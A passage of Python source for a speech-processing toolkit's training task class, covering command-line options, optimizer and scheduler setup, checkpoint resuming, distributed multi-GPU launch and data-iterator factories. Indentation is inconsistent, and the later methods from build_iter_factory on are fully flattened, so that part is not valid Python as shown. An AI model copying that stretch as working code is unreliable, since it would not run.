        type=str2bool,
        default=False,
        help='Write the output features from the model when "collect stats" mode',
    )

    group = parser.add_argument_group("Trainer related")
    group.add_argument(
        "--max_epoch",
        type=int,
        default=40,
        help="The maximum number epoch to train",
    )
    group.add_argument(
        "--patience",
        type=int_or_none,
        default=None,
        help="Number of epochs to wait without improvement "
        "before stopping the training",
    )
    group.add_argument(
        "--val_scheduler_criterion",
        type=str,
        nargs=2,
        default=("valid", "loss"),
        help="The criterion used for the value given to the lr scheduler. "
        'Give a pair referring the phase, "train" or "valid",'
        'and the criterion name. The mode specifying "min" or "max" can '
        "be changed by --scheduler_conf",
    )
    group.add_argument(
        "--early_stopping_criterion",
        type=str,
        nargs=3,
        default=("valid", "loss", "min"),
        help="The criterion used for judging of early stopping. "
        'Give a pair referring the phase, "train" or "valid",'
        'the criterion name and the mode, "min" or "max", e.g. "acc,max".',
    )
    group.add_argument(
        "--best_model_criterion",
        type=str2triple_str,
        nargs="+",
        default=[
            ("train", "loss", "min"),
            ("valid", "loss", "min"),
            ("train", "acc", "max"),
            ("valid", "acc", "max"),
        ],
        help="The criterion used for judging of the best model. "
        'Give a pair referring the phase, "train" or "valid",'
        'the criterion name, and the mode, "min" or "max", e.g. "acc,max".',
    )
    group.add_argument(
        "--keep_nbest_models",
        type=int,
        default=10,
        help="Remove previous snapshots excluding the n-best scored epochs",
    )
    group.add_argument(
        "--grad_clip",
        type=float,
        default=5.0,
        help="Gradient norm threshold to clip",
    )
    group.add_argument(
        "--grad_noise",
        type=str2bool,
        default=False,
        help="The flag to switch to use noise injection to "
        "gradients during training",
    )
    group.add_argument(
        "--accum_grad",
        type=int,
        default=1,
        help="The number of gradient accumulation",
    )
    group.add_argument(
        "--no_forward_run",
        type=str2bool,
        default=False,
        help="Just only iterating data loading without "
        "model forwarding and training",
    )
    group.add_argument(
        "--resume",
        type=str2bool,
        default=False,
        help="Enable resuming if checkpoint is existing",
    )
    group.add_argument(
        "--train_dtype",
        default="float32",
        choices=["float16", "float32", "float64"],
        help="Data type for training.",
    )
    group.add_argument(
        "--use_amp",
        type=str2bool,
        default=False,
        help="Enable Automatic Mixed Precision. This feature requires pytorch>=1.6",
    )
    group.add_argument(
        "--log_interval",
        type=int_or_none,
        default=None,
        help="Show the logs every the number iterations in each epochs at the "
        "training phase. If None is given, it is decided according the number "
        "of training samples automatically .",
    )

    group = parser.add_argument_group("Pretraining model related")
    group.add_argument("--pretrain_path", type=str, default=[], nargs="*")
    group.add_argument("--pretrain_key", type=str_or_none, default=[], nargs="*")

    group = parser.add_argument_group("BatchSampler related")
    group.add_argument(
        "--num_iters_per_epoch",
        type=int_or_none,
        default=None,
        help="Restrict the number of iterations for training per epoch",
    )
    group.add_argument(
        "--batch_size",
        type=int,
        default=20,
        help="The mini-batch size used for training. Used if batch_type='unsorted',"
        " 'sorted', or 'folded'.",
    )
    group.add_argument(
        "--valid_batch_size",
        type=int_or_none,
        default=None,
        help="If not given, the value of --batch_size is used",
    )
    group.add_argument(
        "--batch_bins",
        type=int,
        default=1000000,
        help="The number of batch bins. Used if batch_type='length' or 'numel'",
    )
    group.add_argument(
        "--valid_batch_bins",
        type=int_or_none,
        default=None,
        help="If not given, the value of --batch_bins is used",
    )

    group.add_argument("--train_shape_file", type=str, action="append", default=[])
    group.add_argument("--valid_shape_file", type=str, action="append", default=[])

    group = parser.add_argument_group("Sequence iterator related")
    # Collect the per-type descriptions into one multi-line help string.
    _batch_type_help = ""
    for key, value in BATCH_TYPES.items():
        _batch_type_help += f'"{key}":\n{value}\n'
    group.add_argument(
        "--batch_type",
        type=str,
        default="folded",
        choices=list(BATCH_TYPES),
        help=_batch_type_help,
    )
    group.add_argument(
        "--valid_batch_type",
        type=str_or_none,
        default=None,
        choices=list(BATCH_TYPES) + [None],
        help="If not given, the value of --batch_type is used",
    )
    group.add_argument("--fold_length", type=int, action="append", default=[])
    group.add_argument(
        "--sort_in_batch",
        type=str,
        default="descending",
        choices=["descending", "ascending"],
        help="Sort the samples in each mini-batches by the sample "
        'lengths. To enable this, "shape_file" must have the length information.',
    )
    group.add_argument(
        "--sort_batch",
        type=str,
        default="descending",
        choices=["descending", "ascending"],
        help="Sort mini-batches by the sample lengths",
    )
    group.add_argument(
        "--multiple_iterator",
        type=str2bool,
        default=False,
        help="Use multiple iterator mode",
    )

    group = parser.add_argument_group("Chunk iterator related")
    group.add_argument(
        "--chunk_length",
        type=str_or_int,
        default=500,
        help="Specify chunk length. e.g. '300', '300,400,500', or '300-400'."
        "If multiple numbers separated by command are given, "
        "one of them is selected randomly for each samples. "
        "If two numbers are given with '-', it indicates the range of the choices. "
        "Note that if the sequence length is shorter than the all chunk_lengths, "
        "the sample is discarded. ",
    )
    group.add_argument(
        "--chunk_shift_ratio",
        type=float,
        default=0.5,
        help="Specify the shift width of chunks. If it's less than 1, "
        "allows the overlapping and if bigger than 1, there are some gaps "
        "between each chunk.",
    )
    group.add_argument(
        "--num_cache_chunks",
        type=int,
        default=1024,
        help="Shuffle in the specified number of chunks and generate mini-batches "
        "More larger this value, more randomness can be obtained.",
    )

    group = parser.add_argument_group("Dataset related")
    _data_path_and_name_and_type_help = (
        "Give three words splitted by comma. It's used for the training data. "
        "e.g. '--train_data_path_and_name_and_type some/path/a.scp,foo,sound'. "
        "The first value, some/path/a.scp, indicates the file path, "
        "and the second, foo, is the key name used for the mini-batch data, "
        "and the last, sound, decides the file type. "
        "This option is repeatable, so you can input any number of features "
        "for your task. Supported file types are as follows:\n\n"
    )
    for key, dic in DATA_TYPES.items():
        _data_path_and_name_and_type_help += f'"{key}":\n{dic["help"]}\n\n'
    group.add_argument(
        "--train_data_path_and_name_and_type",
        type=str2triple_str,
        action="append",
        default=[],
        help=_data_path_and_name_and_type_help,
    )
    group.add_argument(
        "--valid_data_path_and_name_and_type",
        type=str2triple_str,
        action="append",
        default=[],
    )
    group.add_argument(
        "--allow_variable_data_keys",
        type=str2bool,
        default=False,
        help="Allow the arbitrary keys for mini-batch with ignoring "
        "the task requirements",
    )
    group.add_argument(
        "--max_cache_size",
        type=humanfriendly.parse_size,
        default=0.0,
        help="The maximum cache size for data loader. e.g. 10MB, 20GB.",
    )
    group.add_argument(
        "--valid_max_cache_size",
        type=humanfriendly_parse_size_or_none,
        default=None,
        help="The maximum cache size for validation data loader. e.g. 10MB, 20GB. "
        "If None, the 5 percent size of --max_cache_size",
    )

    group = parser.add_argument_group("Optimizer related")
    # One option set per optimizer; options beyond the first get a numeric
    # suffix ("--optim2", ...), matching cls.num_optimizers.
    for i in range(1, cls.num_optimizers + 1):
        suf = "" if i == 1 else str(i)
        group.add_argument(
            f"--optim{suf}",
            type=lambda x: x.lower(),
            default="adadelta",
            choices=list(optim_classes),
            help="The optimizer type",
        )
        group.add_argument(
            f"--optim{suf}_conf",
            action=NestedDictAction,
            default=dict(),
            help="The keyword arguments for optimizer",
        )
        group.add_argument(
            f"--scheduler{suf}",
            type=lambda x: str_or_none(x.lower()),
            default=None,
            choices=list(scheduler_classes) + [None],
            help="The lr scheduler type",
        )
        group.add_argument(
            f"--scheduler{suf}_conf",
            action=NestedDictAction,
            default=dict(),
            help="The keyword arguments for lr scheduler",
        )

    # Let the trainer and the concrete task register their own options.
    cls.trainer.add_arguments(parser)
    cls.add_task_arguments(parser)

    assert check_return_type(parser)
    return parser
@classmethod
def build_optimizers(
    cls, args: argparse.Namespace, model: torch.nn.Module,
) -> List[torch.optim.Optimizer]:
    """Build the optimizer list (length 1) from --optim/--optim_conf.

    Tasks with several optimizers must override this method.
    """
    if cls.num_optimizers != 1:
        raise RuntimeError(
            "build_optimizers() must be overridden if num_optimizers != 1"
        )

    factory = optim_classes.get(args.optim)
    if factory is None:
        raise ValueError(f"must be one of {list(optim_classes)}: {args.optim}")
    return [factory(model.parameters(), **args.optim_conf)]
@classmethod
def exclude_opts(cls) -> Tuple[str, ...]:
    """The options not to be shown by --print_config"""
    hidden = ("required", "print_config", "config", "ngpu")
    return hidden
@classmethod
def get_default_config(cls) -> Dict[str, Any]:
    """Return the configuration as dict.

    This method is used by print_config()
    """

    def _lookup(name: str, classes: dict):
        # Resolve a registered class by name, failing loudly on unknown names.
        if name not in classes:
            raise ValueError(f"must be one of {list(classes)}: {name}")
        return classes[name]

    # This method is used only for --print_config
    assert check_argument_types()
    args, _ = cls.get_parser().parse_known_args()
    config = vars(args)

    # Excludes the options not to be shown
    for key in AbsTask.exclude_opts():
        config.pop(key)

    for i in range(1, cls.num_optimizers + 1):
        suf = "" if i == 1 else str(i)

        # Start from the optimizer's signature defaults, overwrite them
        # with the given arguments, and store the merged conf back.
        optim_conf = get_default_kwargs(_lookup(config[f"optim{suf}"], optim_classes))
        optim_conf.update(config[f"optim{suf}_conf"])
        config[f"optim{suf}_conf"] = optim_conf

        scheduler_name = config[f"scheduler{suf}"]
        if scheduler_name is not None:
            sch_conf = get_default_kwargs(_lookup(scheduler_name, scheduler_classes))
            sch_conf.update(config[f"scheduler{suf}_conf"])
            config[f"scheduler{suf}_conf"] = sch_conf

    # Same default-merging for every registered ClassChoices of the task.
    for class_choices in cls.class_choices_list:
        chosen = getattr(args, class_choices.name)
        if chosen is not None:
            conf = get_default_kwargs(class_choices.get_class(chosen))
            conf.update(config[f"{class_choices.name}_conf"])
            config[f"{class_choices.name}_conf"] = conf

    return config
@classmethod
def check_required_command_args(cls, args: argparse.Namespace):
    """Validate parsed arguments; print help and exit(2) on missing ones."""
    assert check_argument_types()

    # A dashed attribute name indicates a typo somewhere in get_parser().
    for key in vars(args):
        if "-" in key:
            raise RuntimeError(f'Use "_" instead of "-": parser.get_parser("{key}")')

    if len(args.pretrain_path) != len(args.pretrain_key):
        raise RuntimeError(
            "The number of --pretrain_path and --pretrain_key must be same"
        )

    missing = [f"--{a}" for a in args.required if getattr(args, a) is None]
    if missing:
        parser = cls.get_parser()
        parser.print_help(file=sys.stderr)
        prog = Path(sys.argv[0]).name
        print(file=sys.stderr)
        print(
            f"{prog}: error: the following arguments are required: "
            f"{', '.join(missing)}",
            file=sys.stderr,
        )
        sys.exit(2)
@classmethod
def check_task_requirements(
    cls,
    dataset: Union[ESPnetDataset, IterableESPnetDataset],
    allow_variable_data_keys: bool,
    inference: bool = False,
) -> None:
    """Check if the dataset satisfy the requirement of current Task"""
    assert check_argument_types()
    mes = (
        f"If you intend to use an additional input, modify "
        f'"{cls.__name__}.required_data_names()" or '
        f'"{cls.__name__}.optional_data_names()". '
        f"Otherwise you need to set --allow_variable_data_keys true "
    )

    # Every name the task requires must be provided by the dataset.
    for name in cls.required_data_names(inference):
        if dataset.has_name(name):
            continue
        raise RuntimeError(
            f'"{cls.required_data_names(inference)}" are required for'
            f' {cls.__name__}. but "{dataset.names()}" are input.\n{mes}'
        )

    # Unknown names are rejected unless explicitly allowed.
    if not allow_variable_data_keys:
        task_keys = cls.required_data_names(inference) + cls.optional_data_names(
            inference
        )
        for name in dataset.names():
            if name not in task_keys:
                raise RuntimeError(
                    f"The data-name must be one of {task_keys} "
                    f'for {cls.__name__}: "{name}" is not allowed.\n{mes}'
                )
@staticmethod
def resume(
    checkpoint: Union[str, Path],
    model: torch.nn.Module,
    reporter: Reporter,
    optimizers: Sequence[torch.optim.Optimizer],
    schedulers: Sequence[Optional[AbsScheduler]],
    scaler: Optional[GradScaler],
    ngpu: int = 0,
):
    """Restore model/reporter/optimizer/scheduler/scaler states from a checkpoint."""
    # Load onto the current GPU when GPUs are used, otherwise onto CPU.
    device = f"cuda:{torch.cuda.current_device()}" if ngpu > 0 else "cpu"
    states = torch.load(checkpoint, map_location=device)

    model.load_state_dict(states["model"])
    reporter.load_state_dict(states["reporter"])
    for optimizer, opt_state in zip(optimizers, states["optimizers"]):
        optimizer.load_state_dict(opt_state)
    for scheduler, sch_state in zip(schedulers, states["schedulers"]):
        if scheduler is not None:
            scheduler.load_state_dict(sch_state)
    if scaler is not None:
        if states["scaler"] is None:
            logging.warning("scaler state is not found")
        else:
            scaler.load_state_dict(states["scaler"])

    logging.info(f"The training was resumed using {checkpoint}")
@classmethod
def print_config(cls, file=sys.stdout) -> None:
    """Dump the default configuration as yaml to *file*."""
    assert check_argument_types()
    # Shows the config: e.g. python train.py asr --print_config
    dumped = yaml_no_alias_safe_dump(
        cls.get_default_config(), indent=4, sort_keys=False
    )
    file.write(dumped)
@classmethod
def main(cls, args: argparse.Namespace = None, cmd: Sequence[str] = None):
    """Entry point: parse arguments, then run main_worker() directly or
    spawn one worker process per GPU in multiprocessing-distributed mode."""
    if cls.num_optimizers != cls.trainer.num_optimizers:
        raise RuntimeError(
            f"Task.num_optimizers != Task.trainer.num_optimizers: "
            f"{cls.num_optimizers} != {cls.trainer.num_optimizers}"
        )

    assert check_argument_types()
    print(get_commandline_args(), file=sys.stderr)

    if args is None:
        parser = cls.get_parser()
        args = parser.parse_args(cmd)
    if args.print_config:
        cls.print_config()
        sys.exit(0)
    cls.check_required_command_args(args)

    # "distributed" is decided using the other command args
    resolve_distributed_mode(args)
    if not args.distributed or not args.multiprocessing_distributed:
        cls.main_worker(args)

    else:
        assert args.ngpu > 1, args.ngpu
        # Multi-processing distributed mode: e.g. 2node-4process-4GPU
        # |   Host1     |    Host2    |
        # |   Process1  |   Process2  |  <= Spawn processes
        # |Child1|Child2|Child1|Child2|
        # |GPU1  |GPU2  |GPU1  |GPU2  |

        # See also the following usage of --multiprocessing-distributed:
        # https://github.com/pytorch/examples/blob/master/imagenet/main.py
        num_nodes = get_num_nodes(args.dist_world_size, args.dist_launcher)
        if num_nodes == 1:
            args.dist_master_addr = "localhost"
            args.dist_rank = 0
            # Single node distributed training with multi-GPUs
            if (
                args.dist_init_method == "env://"
                and get_master_port(args.dist_master_port) is None
            ):
                # Get the unused port
                args.dist_master_port = free_port()

        # Assume that nodes use same number of GPUs each other
        args.dist_world_size = args.ngpu * num_nodes
        node_rank = get_node_rank(args.dist_rank, args.dist_launcher)

        # The following block is copied from:
        # https://github.com/pytorch/pytorch/blob/master/torch/multiprocessing/spawn.py
        error_queues = []
        processes = []
        mp = torch.multiprocessing.get_context("spawn")
        for i in range(args.ngpu):
            # Copy args
            local_args = argparse.Namespace(**vars(args))

            local_args.local_rank = i
            local_args.dist_rank = args.ngpu * node_rank + i
            local_args.ngpu = 1

            process = mp.Process(
                target=cls.main_worker, args=(local_args,), daemon=False,
            )
            process.start()
            processes.append(process)
            # NOTE(review): these queues are never handed to the children, so
            # ProcessContext.join() relies on process exit codes only — confirm
            # this matches the upstream spawn.py contract.
            error_queues.append(mp.SimpleQueue())
        # Loop on join until it returns True or raises an exception.
        while not ProcessContext(processes, error_queues).join():
            pass
    @classmethod
    def main_worker(cls, args: argparse.Namespace):
        """Run the whole training pipeline inside a single worker process.

        Steps: init the distributed backend, configure logging (full logs on
        rank 0 only), seed RNGs, build model/optimizers/schedulers, dump
        config.yaml, load pretrained weights, optionally resume from a
        checkpoint, then either collect statistics (--collect_stats) or run
        the trainer and finally average the n-best checkpoints on rank 0.

        Args:
            args: Fully parsed command-line namespace for this worker
                (in spawned multiprocessing mode, a per-process copy with
                local_rank/dist_rank/ngpu already adjusted by the caller).
        """
        assert check_argument_types()
        # 0. Init distributed process
        distributed_option = build_dataclass(DistributedOption, args)
        distributed_option.init()
        # NOTE(kamo): Don't use logging before invoking logging.basicConfig()
        if not distributed_option.distributed or distributed_option.dist_rank == 0:
            if not distributed_option.distributed:
                _rank = ""
            else:
                # Prefix log lines with ":rank/world_size" so interleaved
                # multi-process logs are attributable.
                _rank = (
                    f":{distributed_option.dist_rank}/"
                    f"{distributed_option.dist_world_size}"
                )
            # NOTE(kamo):
            # logging.basicConfig() is invoked in main_worker() instead of main()
            # because it can be invoked only once in a process.
            # FIXME(kamo): Should we use logging.getLogger()?
            logging.basicConfig(
                level=args.log_level,
                format=f"[{os.uname()[1].split('.')[0]}{_rank}]"
                f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
            )
        else:
            # Suppress logging if RANK != 0
            logging.basicConfig(
                level="ERROR",
                format=f"[{os.uname()[1].split('.')[0]}"
                f":{distributed_option.dist_rank}/{distributed_option.dist_world_size}]"
                f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
            )
        # 1. Set random-seed
        set_all_random_seed(args.seed)
        torch.backends.cudnn.enabled = args.cudnn_enabled
        torch.backends.cudnn.benchmark = args.cudnn_benchmark
        torch.backends.cudnn.deterministic = args.cudnn_deterministic
        # 2. Build model
        model = cls.build_model(args=args)
        if not isinstance(model, AbsESPnetModel):
            raise RuntimeError(
                f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
            )
        model = model.to(
            dtype=getattr(torch, args.train_dtype),
            device="cuda" if args.ngpu > 0 else "cpu",
        )
        # 3. Build optimizer
        optimizers = cls.build_optimizers(args, model=model)
        # 4. Build schedulers
        # One scheduler slot per optimizer; option names are "scheduler",
        # "scheduler2", ... matching optimizer ordinals starting at 1.
        schedulers = []
        for i, optim in enumerate(optimizers, 1):
            suf = "" if i == 1 else str(i)
            name = getattr(args, f"scheduler{suf}")
            conf = getattr(args, f"scheduler{suf}_conf")
            if name is not None:
                cls_ = scheduler_classes.get(name)
                if cls_ is None:
                    raise ValueError(
                        f"must be one of {list(scheduler_classes)}: {name}"
                    )
                scheduler = cls_(optim, **conf)
            else:
                scheduler = None
            schedulers.append(scheduler)
        logging.info(pytorch_cudnn_version())
        logging.info(model_summary(model))
        for i, (o, s) in enumerate(zip(optimizers, schedulers), 1):
            suf = "" if i == 1 else str(i)
            logging.info(f"Optimizer{suf}:\n{o}")
            logging.info(f"Scheduler{suf}: {s}")
        # 5. Dump "args" to config.yaml
        # NOTE(kamo): "args" should be saved after object-buildings are done
        # because they are allowed to modify "args".
        output_dir = Path(args.output_dir)
        if not distributed_option.distributed or distributed_option.dist_rank == 0:
            output_dir.mkdir(parents=True, exist_ok=True)
            with (output_dir / "config.yaml").open("w", encoding="utf-8") as f:
                logging.info(
                    f'Saving the configuration in {output_dir / "config.yaml"}'
                )
                yaml_no_alias_safe_dump(vars(args), f, indent=4, sort_keys=False)
        # 6. Loads pre-trained model
        for p, k in zip(args.pretrain_path, args.pretrain_key):
            load_pretrained_model(
                model=model,
                # Directly specify the model path e.g. exp/train/loss.best.pt
                pretrain_path=p,
                # if pretrain_key is None -> model
                # elif pretrain_key is str e.g. "encoder" -> model.encoder
                pretrain_key=k,
                # NOTE(kamo): "cuda" for torch.load always indicates cuda:0
                # in PyTorch<=1.4
                map_location=f"cuda:{torch.cuda.current_device()}"
                if args.ngpu > 0
                else "cpu",
            )
        # 7. Resume the training state from the previous epoch
        reporter = Reporter()
        if args.use_amp:
            if LooseVersion(torch.__version__) < LooseVersion("1.6.0"):
                raise RuntimeError(
                    "Require torch>=1.6.0 for Automatic Mixed Precision"
                )
            scaler = GradScaler()
        else:
            scaler = None
        if args.resume and (output_dir / "checkpoint.pth").exists():
            cls.resume(
                checkpoint=output_dir / "checkpoint.pth",
                model=model,
                optimizers=optimizers,
                schedulers=schedulers,
                reporter=reporter,
                scaler=scaler,
                ngpu=args.ngpu,
            )
        if args.dry_run:
            # Everything above (model build, config dump, resume) is still
            # exercised; only the actual data pass is skipped.
            pass
        elif args.collect_stats:
            # Perform on collect_stats mode. This mode has two roles
            # - Derive the length and dimension of all input data
            # - Accumulate feats, square values, and the length for whitening
            if args.valid_batch_size is None:
                args.valid_batch_size = args.batch_size
            if len(args.train_shape_file) != 0:
                train_key_file = args.train_shape_file[0]
            else:
                train_key_file = None
            if len(args.valid_shape_file) != 0:
                valid_key_file = args.valid_shape_file[0]
            else:
                valid_key_file = None
            collect_stats(
                model=model,
                train_iter=cls.build_streaming_iterator(
                    data_path_and_name_and_type=args.train_data_path_and_name_and_type,
                    key_file=train_key_file,
                    batch_size=args.batch_size,
                    dtype=args.train_dtype,
                    num_workers=args.num_workers,
                    allow_variable_data_keys=args.allow_variable_data_keys,
                    ngpu=args.ngpu,
                    preprocess_fn=cls.build_preprocess_fn(args, train=False),
                    collate_fn=cls.build_collate_fn(args),
                ),
                valid_iter=cls.build_streaming_iterator(
                    data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
                    key_file=valid_key_file,
                    batch_size=args.valid_batch_size,
                    dtype=args.train_dtype,
                    num_workers=args.num_workers,
                    allow_variable_data_keys=args.allow_variable_data_keys,
                    ngpu=args.ngpu,
                    preprocess_fn=cls.build_preprocess_fn(args, train=False),
                    collate_fn=cls.build_collate_fn(args),
                ),
                output_dir=output_dir,
                ngpu=args.ngpu,
                log_interval=args.log_interval,
                write_collected_feats=args.write_collected_feats,
            )
        else:
            # 8. Build iterator factories
            common_iter_kwargs = dict(
                iterator_type=args.iterator_type,
                train_dtype=args.train_dtype,
                num_workers=args.num_workers,
                seed=args.seed,
                allow_variable_data_keys=args.allow_variable_data_keys,
                ngpu=args.ngpu,
                fold_length=args.fold_length,
                sort_in_batch=args.sort_in_batch,
                sort_batch=args.sort_batch,
                chunk_length=args.chunk_length,
                chunk_shift_ratio=args.chunk_shift_ratio,
                num_cache_chunks=args.num_cache_chunks,
            )
            train_iter_factory = cls.build_iter_factory(
                data_path_and_name_and_type=args.train_data_path_and_name_and_type,
                shape_files=args.train_shape_file,
                batch_size=args.batch_size,
                batch_bins=args.batch_bins,
                batch_type=args.batch_type,
                train=not args.collect_stats,
                multiple_iterator=args.multiple_iterator,
                preprocess_fn=cls.build_preprocess_fn(args, train=True),
                collate_fn=cls.build_collate_fn(args),
                num_iters_per_epoch=args.num_iters_per_epoch,
                max_cache_size=args.max_cache_size,
                distributed=distributed_option.distributed,
                name="train",
                **common_iter_kwargs,
            )
            # Validation options fall back to their training counterparts.
            if args.valid_batch_type is None:
                args.valid_batch_type = args.batch_type
            if args.valid_batch_size is None:
                args.valid_batch_size = args.batch_size
            if args.valid_batch_bins is None:
                args.valid_batch_bins = args.batch_bins
            if args.valid_max_cache_size is None:
                # Cache 5% of maximum size for validation loader
                args.valid_max_cache_size = 0.05 * args.max_cache_size
            valid_iter_factory = cls.build_iter_factory(
                data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
                shape_files=args.valid_shape_file,
                batch_size=args.valid_batch_size,
                batch_bins=args.valid_batch_bins,
                batch_type=args.batch_type,
                train=False,
                multiple_iterator=False,
                preprocess_fn=cls.build_preprocess_fn(args, train=False),
                collate_fn=cls.build_collate_fn(args),
                num_iters_per_epoch=None,
                max_cache_size=args.valid_max_cache_size,
                distributed=distributed_option.distributed,
                name="valid",
                **common_iter_kwargs,
            )
            if args.num_att_plot != 0:
                plot_attention_iter_factory = cls.build_iter_factory(
                    data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
                    shape_files=args.valid_shape_file,
                    batch_type="unsorted",
                    batch_size=1,
                    batch_bins=0,
                    train=False,
                    multiple_iterator=False,
                    preprocess_fn=cls.build_preprocess_fn(args, train=False),
                    collate_fn=cls.build_collate_fn(args),
                    num_batches=args.num_att_plot,
                    num_iters_per_epoch=None,
                    # num_att_plot should be a few sample ~ 3, so cache all data.
                    max_cache_size=np.inf if args.max_cache_size != 0.0 else 0.0,
                    # always False because plot_attention performs on RANK0
                    distributed=False,
                    name="plot_att",
                    **common_iter_kwargs,
                )
            else:
                plot_attention_iter_factory = None
            # 9. Start training
            # Don't give args to trainer.run() directly!!!
            # Instead of it, define "Options" object and build here.
            trainer_options = cls.trainer.build_options(args)
            cls.trainer.run(
                model=model,
                optimizers=optimizers,
                schedulers=schedulers,
                train_iter_factory=train_iter_factory,
                valid_iter_factory=valid_iter_factory,
                plot_attention_iter_factory=plot_attention_iter_factory,
                reporter=reporter,
                scaler=scaler,
                output_dir=output_dir,
                max_epoch=args.max_epoch,
                seed=args.seed,
                patience=args.patience,
                keep_nbest_models=args.keep_nbest_models,
                early_stopping_criterion=args.early_stopping_criterion,
                best_model_criterion=args.best_model_criterion,
                val_scheduler_criterion=args.val_scheduler_criterion,
                trainer_options=trainer_options,
                distributed_option=distributed_option,
            )
            if not distributed_option.distributed or distributed_option.dist_rank == 0:
                # Generated n-best averaged model
                average_nbest_models(
                    reporter=reporter,
                    output_dir=output_dir,
                    best_model_criterion=args.best_model_criterion,
                    nbest=args.keep_nbest_models,
                )
@classmethod
def build_iter_factory(
cls,
iterator_type: str,
batch_size: int,
batch_bins: int,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
fold_length: Sequence[int],
sort_in_batch: str,
sort_batch: str,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
multiple_iterator: bool,
num_batches: int = None,
) -> AbsIterFactory:
"""Build a factory object of mini-batch iterator.
This object is invoked at every epochs to build the iterator for each epoch
as following:
>>> iter_factory = cls.build_iter_factory(...)
>>> for epoch in range(1, max_epoch):
... for keys, batch in iter_fatory.build_iter(epoch):
... model(**batch)
The mini-batches for each epochs are fully controlled by this class.
Note that the random seed used for shuffling is decided as "seed + epoch" and
the generated mini-batches can be reproduces when resuming.
Note that the definition of "epoch" doesn't always indicate
to run out of the whole training corpus.
"--num_iters_per_epoch" option restricts the number of iterations for each epoch
and the rest of samples for the originally epoch are left for the next epoch.
e.g. If The number of mini-batches equals to 4, the following two are same:
- 1 epoch without "--num_iters_per_epoch"
- 4 epoch with "--num_iters_per_epoch" == 4
"""
assert check_argument_types()
kwargs = dict(
data_path_and_name_and_type=data_path_and_name_and_type,
shape_files=shape_files,
train=train,
preprocess_fn=preprocess_fn,
collate_fn=collate_fn,
num_batches=num_batches,
num_iters_per_epoch=num_iters_per_epoch,
max_cache_size=max_cache_size,
distributed=distributed,
name=name,
batch_size=batch_size,
train_dtype=train_dtype,
num_workers=num_workers,
seed=seed,
allow_variable_data_keys=allow_variable_data_keys,
ngpu=ngpu,
)
if multiple_iterator:
return cls.build_multiple_iter_factroy(
**kwargs,
multiple_iterator=False,
iterator_type=iterator_type,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
elif iterator_type == "sequence":
return cls.build_sequence_iter_factory(
**kwargs,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
)
elif iterator_type == "chunk":
return cls.build_chunk_iter_factory(
**kwargs,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
else:
raise RuntimeError(f"Not supported: iterator_type={iterator_type}")
@classmethod
def build_sequence_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
preprocess_fn,
batch_size: int,
batch_bins: int,
collate_fn,
train_dtype: str,
fold_length: Sequence[int],
num_workers: int,
sort_in_batch: str,
sort_batch: str,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
batch_sampler = build_batch_sampler(
type=batch_type,
shape_files=shape_files,
fold_lengths=fold_length,
batch_size=batch_size,
batch_bins=batch_bins,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
drop_last=False,
min_batch_size=torch.distributed.get_world_size() if distributed else 1,
)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
bs_list = [len(batch) for batch in batches]
logging.info(f"[{name}] dataset:\n{dataset}")
logging.info(f"[{name}] Batch sampler: {batch_sampler}")
logging.info(
f"[{name}] mini-batch sizes summary: N-batch={len(bs_list)}, "
f"mean={np.mean(bs_list):.1f}, min={np.min(bs_list)}, max={np.max(bs_list)}"
)
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
for batch in batches:
if len(batch) < world_size:
raise RuntimeError(
f"The batch-size must be equal or more than world_size: "
f"{len(batch)} < {world_size}"
)
batches = [batch[rank::world_size] for batch in batches]
return SequenceIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
num_iters_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
)
@classmethod
def build_chunk_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
batch_size: int,
ngpu: int,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
if len(shape_files) == 0:
key_file = data_path_and_name_and_type[0][0]
else:
key_file = shape_files[0]
batch_sampler = UnsortedBatchSampler(batch_size=1, key_file=key_file)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
logging.info(f"[{name}] dataset:\n{dataset}")
if distributed:
world_size = torch.distributed.get_world_size()
